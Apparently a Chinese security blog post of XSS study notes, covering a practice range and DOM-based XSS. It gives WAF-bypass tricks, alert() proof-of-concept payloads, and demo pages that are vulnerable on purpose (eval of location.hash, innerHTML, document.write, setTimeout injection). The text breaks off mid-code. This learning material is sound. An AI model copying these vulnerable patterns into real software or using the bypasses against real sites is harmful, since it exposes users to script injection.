<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="XSS,靶场学习,dom-xss," />





  <link rel="alternate" href="/atom.xml" title="Mugen" type="application/atom+xml" />






<meta name="description" content="xss靶场地址：http://test.xss.tv/ 参考wp:https://xz.aliyun.com/t/1206 小记：  &amp;lt;input&amp;gt;标签里面可触发alert的事件oninput 和 onchange  &amp;lt;a&amp;gt;href的javascript 1&amp;lt;a href=&amp;quot;javascript:alert(/1/)&amp;quot;&amp;gt;axxx&amp;lt;/a&amp;">
<meta name="keywords" content="XSS,靶场学习,dom-xss">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS学习小记">
<meta property="og:url" content="http://legoc.gitee.io/2019/02/26/XSS学习小记/index.html">
<meta property="og:site_name" content="Mugen">
<meta property="og:description" content="xss靶场地址：http://test.xss.tv/ 参考wp:https://xz.aliyun.com/t/1206 小记：  &amp;lt;input&amp;gt;标签里面可触发alert的事件oninput 和 onchange  &amp;lt;a&amp;gt;href的javascript 1&amp;lt;a href=&amp;quot;javascript:alert(/1/)&amp;quot;&amp;gt;axxx&amp;lt;/a&amp;">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2019-03-08T04:52:32.186Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="XSS学习小记">
<meta name="twitter:description" content="xss靶场地址：http://test.xss.tv/ 参考wp:https://xz.aliyun.com/t/1206 小记：  &amp;lt;input&amp;gt;标签里面可触发alert的事件oninput 和 onchange  &amp;lt;a&amp;gt;href的javascript 1&amp;lt;a href=&amp;quot;javascript:alert(/1/)&amp;quot;&amp;gt;axxx&amp;lt;/a&amp;">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://legoc.gitee.io/2019/02/26/XSS学习小记/"/>





  <title>XSS学习小记 | Mugen</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Mugen</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">lego's blog</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-links">
          <a href="/links" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-flag"></i> <br />
            
            朋友
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于我
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://legoc.gitee.io/2019/02/26/XSS学习小记/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="lego">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="https://raw.githubusercontent.com/legoc/legoc.github.io/master/about/index/baye.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Mugen">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">XSS学习小记</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2019-02-26T11:38:00+08:00">
                2019-02-26
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/笔记/" itemprop="url" rel="index">
                    <span itemprop="name">笔记</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv"><i class="fa fa-file-o"></i> 阅读次数
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="xss靶场"><a href="#xss靶场" class="headerlink" title="xss靶场"></a>xss靶场</h1><p>地址：<a href="http://test.xss.tv/" target="_blank" rel="noopener">http://test.xss.tv/</a></p>
<p>参考wp:<a href="https://xz.aliyun.com/t/1206" target="_blank" rel="noopener">https://xz.aliyun.com/t/1206</a></p>
<p>小记：</p>
<ol>
<li><p><code>&lt;input&gt;</code>标签里面可触发alert的事件<code>oninput</code> 和 <code>onchange</code></p>
</li>
<li><p><code>&lt;a&gt;</code>href的javascript</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=&quot;javascript:alert(/1/)&quot;&gt;axxx&lt;/a&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p>有waf过滤时，多查看源码，看看payload发生了什么变化</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">常用绕过方式 双写绕过 大小写绕过</span><br></pre></td></tr></table></figure>
</li>
<li><p>协议绕过</p>
</li>
<li><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">Javascript：伪协议后面可以使用URL编码。</span><br><span class="line">如：&lt;a href=&quot;javas%09cript:alert(1)&quot;&gt;click me&lt;/a&gt;可成功执行弹窗。</span><br><span class="line">可用img就不行:&lt;img src=1 onerror=&quot;javas%09cript:alert(1)&quot;&gt;</span><br><span class="line">因为href属性会跳转到其中的URL，而会进行URL解码，onerror属性只会执行JS,不跳转同时后面的url编码可以再做一次entity(HTML实体)编码：</span><br><span class="line">%09 --&gt; TAB</span><br><span class="line">%0d --&gt; 回车</span><br><span class="line">%0a --&gt; 空格</span><br></pre></td></tr></table></figure>
<p>html标签不区分大小写，但是javascript区分大小写</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;iMg sRc=x onError=alert(1)&gt;    弹窗</span><br><span class="line">&lt;iMg sRc=x onError=aLert(1)&gt;    不弹窗</span><br></pre></td></tr></table></figure>
</li>
<li><p>referer和User-Agent和xff cookie等也可能造成XSS（当这些信息会输出到页面时）</p>
</li>
<li><p>angularjs的ng-include 加载外面html导致的XSS</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?src=&apos;level1.php?name=test&lt;img src=1 onerror=alert(1)&gt;&apos;</span><br></pre></td></tr></table></figure>
</li>
<li><p>flash xss</p>
<p>flash xss可使用JPEXS 对下载的flash进行逆向分析，找到关键函数</p>
<p>Flash xss检测脚本的简单实现 <a href="https://www.freebuf.com/sectool/108568.html" target="_blank" rel="noopener">https://www.freebuf.com/sectool/108568.html</a></p>
</li>
</ol>
<h1 id="dom-xss"><a href="#dom-xss" class="headerlink" title="dom-xss"></a>dom-xss</h1><h3 id="一个简单的demo"><a href="#一个简单的demo" class="headerlink" title="一个简单的demo"></a>一个简单的demo</h3><p>test.html</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">    &lt;title&gt;XSSdemo&lt;/title&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;script&gt;    </span><br><span class="line">	eval(location.hash.substr(1));</span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">    test</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxxxx/test.html#alert(1);</span><br></pre></td></tr></table></figure>
<p>分析</p>
<p>location.hash.substr(1)</p>
<p>提取出来的是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">alert(1)</span><br></pre></td></tr></table></figure>
<p>eval执行了alert(1)，从而引发了xss</p>
<h3 id="几种常见的dom型xss"><a href="#几种常见的dom型xss" class="headerlink" title="几种常见的dom型xss"></a>几种常见的dom型xss</h3><h4 id="使用document-write直接输出导致浏览器解析恶意代码"><a href="#使用document-write直接输出导致浏览器解析恶意代码" class="headerlink" title="使用document.write直接输出导致浏览器解析恶意代码"></a>使用document.write直接输出导致浏览器解析恶意代码</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">  &lt;head&gt;</span><br><span class="line">    &lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">    &lt;title&gt;&lt;/title&gt;</span><br><span class="line">    &lt;script type=&quot;text/javascript&quot;&gt;</span><br><span class="line">        var s=location.search;          //返回URL中的查询部分（？之后的内容）</span><br><span class="line">          s=s.substring(1,s.length);    //返回整个查询内容</span><br><span class="line">        var url=&quot;&quot;;                     //定义变量url</span><br><span class="line">        if(s.indexOf(&quot;url=&quot;)&gt;-1)&#123;       //判断URL是否为空 </span><br><span class="line">          var pos=s.indexOf(&quot;url=&quot;)+4;  //过滤掉&quot;url=&quot;字符</span><br><span class="line">          url=s.substring(pos,s.length); //得到地址栏里的url参数</span><br><span class="line">        &#125;else&#123;</span><br><span class="line">          url=&quot;url参数为空&quot;;</span><br><span class="line">        &#125;</span><br><span class="line">        document.write(&quot;url: &lt;a href=&apos;&quot;+url+&quot;&apos;&gt;&quot;+url+&quot;&lt;/a&gt;&quot;);  //输出</span><br><span class="line">    &lt;/script&gt;</span><br><span class="line">  &lt;/head&gt;</span><br><span class="line">  &lt;body&gt;</span><br><span class="line">  &lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx/test.html?url=javascript:alert(1)</span><br></pre></td></tr></table></figure>
<h4 id="使用innerHTML直接输出导致浏览器解析恶意代码"><a href="#使用innerHTML直接输出导致浏览器解析恶意代码" class="headerlink" title="使用innerHTML直接输出导致浏览器解析恶意代码"></a>使用innerHTML直接输出导致浏览器解析恶意代码</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">  &lt;html&gt;</span><br><span class="line">    &lt;head&gt;</span><br><span class="line">      &lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">      &lt;title&gt;&lt;/title&gt;</span><br><span class="line">      &lt;script type=&quot;text/javascript&quot;&gt;</span><br><span class="line">          var s=location.search;          //返回URL中的查询部分（？之后的内容）</span><br><span class="line">            s=s.substring(1,s.length);    //返回整个查询内容</span><br><span class="line">          var url=&quot;&quot;;                     //定义变量url</span><br><span class="line">          if(s.indexOf(&quot;url=&quot;)&gt;-1)&#123;       //判断URL是否为空</span><br><span class="line">            var pos=s.indexOf(&quot;url=&quot;)+4;  //过滤掉&quot;url=&quot;字符</span><br><span class="line">            url=s.substring(pos,s.length); //得到地址栏里的url参数</span><br><span class="line">          &#125;else&#123;</span><br><span class="line">            url=&quot;url参数为空&quot;;</span><br><span class="line">          &#125;</span><br><span class="line">      &lt;/script&gt;</span><br><span class="line">    &lt;/head&gt;</span><br><span class="line">    &lt;body&gt;</span><br><span class="line">      &lt;span id=&apos;test&apos;&gt;&lt;a href=&quot;&quot;&gt;&lt;/a&gt;&lt;/span&gt;</span><br><span class="line">       &lt;script type=&quot;text/javascript&quot;&gt;document.getElementById(&quot;test&quot;).innerHTML=&quot;我的url是: &lt;a href=&apos;&quot;+url+&quot;&apos;&gt;&quot;+url+&quot;&lt;/a&gt;&quot;; &lt;/script&gt;</span><br><span class="line">    &lt;/body&gt;</span><br><span class="line">  &lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">xxx/test.html?url=javascript:alert(1)</span><br></pre></td></tr></table></figure>
<h4 id="使用location-location-href-location-replace-iframe-src造成的XSS"><a href="#使用location-location-href-location-replace-iframe-src造成的XSS" class="headerlink" title="使用location/location.href/location.replace/iframe.src造成的XSS"></a>使用location/location.href/location.replace/iframe.src造成的XSS</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">     &lt;html&gt;</span><br><span class="line">       &lt;head&gt;</span><br><span class="line">         &lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">         &lt;title&gt;&lt;/title&gt;</span><br><span class="line">         &lt;script type=&quot;text/javascript&quot;&gt;</span><br><span class="line">             var s=location.search;          //返回URL中的查询部分（？之后的内容）</span><br><span class="line">               s=s.substring(1,s.length);    //返回整个查询内容</span><br><span class="line">             var url=&quot;&quot;;                     //定义变量url</span><br><span class="line">             if(s.indexOf(&quot;url=&quot;)&gt;-1)&#123;       //判断URL是否为空</span><br><span class="line">               var pos=s.indexOf(&quot;url=&quot;)+4;  //过滤掉&quot;url=&quot;字符</span><br><span class="line">               url=s.substring(pos,s.length); //得到地址栏里的url参数</span><br><span class="line">             // &#125;else&#123;                        //此处注释掉</span><br><span class="line">             //   url=&quot;url参数为空&quot;;          //此处注释掉</span><br><span class="line">              &#125;</span><br><span class="line">         &lt;/script&gt;</span><br><span class="line">       &lt;/head&gt;</span><br><span class="line">       &lt;body&gt;</span><br><span class="line">         &lt;span id=&apos;test&apos;&gt;&lt;a href=&quot;&quot;&gt;&lt;/a&gt;&lt;/span&gt;</span><br><span class="line">          &lt;script type=&quot;text/javascript&quot;&gt;location.href=url&lt;/script&gt;</span><br><span class="line">       &lt;/body&gt;</span><br><span class="line">     &lt;/html&gt;</span><br></pre></td></tr></table></figure>
<h4 id="使用setTimeout-setInterval造成的XSS"><a href="#使用setTimeout-setInterval造成的XSS" class="headerlink" title="使用setTimeout/setInterval造成的XSS"></a>使用setTimeout/setInterval造成的XSS</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">       &lt;html&gt;</span><br><span class="line">         &lt;head&gt;</span><br><span class="line">           &lt;meta charset=&quot;utf-8&quot;&gt;</span><br><span class="line">           &lt;title&gt;&lt;/title&gt;</span><br><span class="line">           &lt;script type=&quot;text/javascript&quot;&gt;</span><br><span class="line">               var s=location.search;          //返回URL中的查询部分（？之后的内容）</span><br><span class="line">                 s=s.substring(1,s.length);    //返回整个查询内容</span><br><span class="line">               var url=&quot;&quot;;                     //定义变量url</span><br><span class="line">               if(s.indexOf(&quot;url=&quot;)&gt;-1)&#123;       //判断URL是否为空</span><br><span class="line">                 var pos=s.indexOf(&quot;url=&quot;)+4;  //过滤掉&quot;url=&quot;字符</span><br><span class="line">                 url=s.substring(pos,s.length); //得到地址栏里的url参数</span><br><span class="line">                 &#125;else&#123;</span><br><span class="line">                   url=&quot;url参数为空&quot;;</span><br><span class="line">                &#125;</span><br><span class="line">           &lt;/script&gt;</span><br><span class="line">         &lt;/head&gt;</span><br><span class="line">         &lt;body&gt;</span><br><span class="line">           &lt;textarea id=&quot;test&quot; rows=&quot;8&quot; cols=&quot;40&quot;&gt;2s获取url&lt;/textarea&gt;</span><br><span class="line">           &lt;script type=&quot;text/javascript&quot;&gt;</span><br><span class="line">              function showURL(url)&#123;</span><br><span class="line">                document.getElementById(&apos;test&apos;).value=url;</span><br><span class="line">              &#125;</span><br><span class="line">              if(url!=&quot;url参数为空&quot;)</span><br><span class="line">              setTimeout(&quot;showURL(&apos;&quot;+url+&quot;&apos;)&quot;,2000);</span><br><span class="line">                   //setInterval(&quot;showURL(&apos;&quot;+url+&quot;&apos;)&quot;,3000);</span><br><span class="line">           &lt;/script&gt;</span><br><span class="line">         &lt;/body&gt;</span><br><span class="line">       &lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.html?url=aa&apos;);alert(&apos;xsstest&apos;);eval(&apos;</span><br></pre></td></tr></table></figure>
<p>setTimeout变成</p>
<p>setTimeout(“showURL(‘“‘);alert(‘xsstest’);eval(‘+url+”‘)”,2000);</p>
<p>火狐下会自动对参数传输进行url编码</p>
<p>导致xss失败</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">输出为aa%27);alert(%27xsstest%27);eval(%27</span><br></pre></td></tr></table></figure>
<p>edge下有效</p>
<h3 id="dom-xss实例"><a href="#dom-xss实例" class="headerlink" title="dom-xss实例"></a>dom-xss实例</h3><p>色块XSS</p>
<p>test.htm</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line">&lt;script type=&quot;text/javascript&quot;&gt;</span><br><span class="line">varname = location.search.substr(1);</span><br><span class="line">var varnames = varname.split(&apos;|&apos;);</span><br><span class="line">varname = varnames[0];</span><br><span class="line">varnamev = varnames[1];</span><br><span class="line">fun = varnames[2] || &apos;&apos;;</span><br><span class="line">var colors = &apos;\</span><br><span class="line">000000#000000#000033#000066#000099#0000CC#0000FF#003300#003333#003366#003399#0033CC#0033FF#006600#006633#006666#006699#0066CC#0066FF#\</span><br><span class="line">333333#009900#009933#009966#009999#0099CC#0099FF#00CC00#00CC33#00CC66#00CC99#00CCCC#00CCFF#00FF00#00FF33#00FF66#00FF99#00FFCC#00FFFF#\</span><br><span class="line">666666#330000#330033#330066#330099#3300CC#3300FF#333300#333333#333366#333399#3333CC#3333FF#336600#336633#336666#336699#3366CC#3366FF#\</span><br><span class="line">999999#339900#339933#339966#339999#3399CC#3399FF#33CC00#33CC33#33CC66#33CC99#33CCCC#33CCFF#33FF00#33FF33#33FF66#33FF99#33FFCC#33FFFF#\</span><br><span class="line">CCCCCC#660000#660033#660066#660099#6600CC#6600FF#663300#663333#663366#663399#6633CC#6633FF#666600#666633#666666#666699#6666CC#6666FF#\</span><br><span class="line">FFFFFF#669900#669933#669966#669999#6699CC#6699FF#66CC00#66CC33#66CC66#66CC99#66CCCC#66CCFF#66FF00#66FF33#66FF66#66FF99#66FFCC#66FFFF#\</span><br><span class="line">FF0000#990000#990033#990066#990099#9900CC#9900FF#993300#993333#993366#993399#9933CC#9933FF#996600#996633#996666#996699#9966CC#9966FF#\</span><br><span class="line">00FF00#999900#999933#999966#999999#9999CC#9999FF#99CC00#99CC33#99CC66#99CC99#99CCCC#99CCFF#99FF00#99FF33#99FF66#99FF99#99FFCC#99FFFF#\</span><br><span class="line">0000FF#CC0000#CC0033#CC0066#CC0099#CC00CC#CC00FF#CC3300#CC3333#CC3366#CC3399#CC33CC#CC33FF#CC6600#CC6633#CC6666#CC6699#CC66CC#CC66FF#\</span><br><span class="line">FFFF00#CC9900#CC9933#CC9966#CC9999#CC99CC#CC99FF#CCCC00#CCCC33#CCCC66#CCCC99#CCCCCC#CCCCFF#CCFF00#CCFF33#CCFF66#CCFF99#CCFFCC#CCFFFF#\</span><br><span class="line">00FFFF#FF0000#FF0033#FF0066#FF0099#FF00CC#FF00FF#FF3300#FF3333#FF3366#FF3399#FF33CC#FF33FF#FF6600#FF6633#FF6666#FF6699#FF66CC#FF66FF#\</span><br><span class="line">FF00FF#FF9900#FF9933#FF9966#FF9999#FF99CC#FF99FF#FFCC00#FFCC33#FFCC66#FFCC99#FFCCCC#FFCCFF#FFFF00#FFFF33#FFFF66#FFFF99#FFFFCC#FFFFFF&apos;;</span><br><span class="line">var colorarray = colors.split(&apos;#&apos;);</span><br><span class="line">var setv = &apos;&apos;;</span><br><span class="line">function showcolors() &#123;</span><br><span class="line">	var s = &apos;&apos;;</span><br><span class="line">	for(c in colorarray) &#123;</span><br><span class="line">		s += &apos;&lt;em onmouseover=&quot;v(\&apos;&apos; + colorarray[c] + &apos;\&apos;)&quot; style=&quot;background-color:#&apos; + colorarray[c] + &apos;&quot;&gt;&lt;/em&gt;&apos;;</span><br><span class="line">	&#125;</span><br><span class="line">	document.getElementById(&apos;colors&apos;).innerHTML = s;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function setvalue(obj) &#123;</span><br><span class="line">	if(varname) &#123;</span><br><span class="line">		parent.$(varname).style.backgroundColor = setv;</span><br><span class="line">	&#125;</span><br><span class="line">	if(varnamev) &#123;</span><br><span class="line">		parent.$(varnamev).value = setv;</span><br><span class="line">	&#125;</span><br><span class="line">	if(fun) eval(&apos;parent.&apos;+fun+&apos;(&quot;&apos;+setv+&apos;&quot;)&apos;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function v(v) &#123;</span><br><span class="line">	v = v != &apos;transparent&apos; ? &apos;#&apos; + v : &apos;transparent&apos;;</span><br><span class="line">	document.getElementById(&apos;p&apos;).style.backgroundColor = v;</span><br><span class="line">	setv = v;</span><br><span class="line">	document.getElementById(&apos;pv&apos;).innerHTML = v;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">&lt;/script&gt;</span><br><span class="line">&lt;style&gt;</span><br><span class="line">body &#123; margin:0px;background-color:#333; &#125;</span><br><span class="line">#h &#123; padding:0;width:210px;height:15px;background-color:#CCC;overflow:hidden;&#125;</span><br><span class="line">#p &#123; margin:0;display:block;float:left;font-size:0;width:140px;height:13px;background:#DDF0DF; &#125;</span><br><span class="line">#pv &#123; margin:0;display:block;float:left;font-size:12px;width:58px;height:13px;overflow:hidden;text-align: right;font-style:normal;background:#DDF0DF; &#125;</span><br><span class="line">#colors &#123; clear:both;width:209px; height:133px; &#125;</span><br><span class="line">#colors em, .trans &#123; font-size:0;margin:1px 0 0 1px;width:10px;height:10px;float:left;cursor:pointer; &#125;</span><br><span class="line">.trans &#123; background-color: #FFF; &#125;</span><br><span class="line">&lt;/style&gt;</span><br><span class="line"></span><br><span class="line">&lt;body onmousedown=&quot;setvalue(document.getElementById(&apos;colorhex&apos;))&quot; scrolling=&quot;no&quot;&gt;</span><br><span class="line">&lt;div id=&quot;h&quot;&gt;&lt;em id=&quot;p&quot;&gt;&lt;/em&gt;&lt;em id=&quot;pv&quot;&gt;&lt;/em&gt;&lt;em class=&quot;trans&quot; onmouseover=&quot;v(&apos;transparent&apos;)&quot; 